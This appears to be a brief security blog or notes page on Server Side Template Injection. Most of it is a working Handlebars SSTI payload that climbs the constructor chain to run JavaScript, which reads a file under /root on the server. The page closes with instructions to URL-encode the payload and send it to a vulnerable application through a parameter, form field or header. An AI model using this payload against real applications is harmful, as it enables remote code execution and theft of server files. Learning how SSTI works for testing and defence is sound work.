Keyboard shortcuts

Press or to navigate between chapters

Press S or / to search in the book

Press ? to show this help

Press Esc to hide this help

🏠 Back to Blog

Server Side Template Injection

Server Side Template Injection (SSTI) is a vulnerability that allows an attacker to inject malicious template code into a web application. This can lead to remote code execution, data leakage, and other security issues.

Example:

{{#with "s" as |string|}}
  {{#with "e"}}
    {{#with split as |conslist|}}
      {{this.pop}}
      {{this.push (lookup string.sub "constructor")}}
      {{this.pop}}
      {{#with string.split as |codelist|}}
        {{this.pop}}
        {{this.push "return process.mainModule.require('fs').readFileSync('/root/some-file',{encoding:'utf8',flag:'r'});"}}
        {{this.pop}}
        {{#each conslist}}
          {{#with (string.sub.apply 0 codelist)}}
            {{this}}
          {{/with}}
        {{/each}}
      {{/with}}
    {{/with}}
  {{/with}}
{{/with}}

You will first need to encode this payload using URL encoding before sending it to the server. Once encoded, you can include it in a request to the vulnerable web application via a query parameter, form field, or HTTP header, depending on where the SSTI vulnerability exists.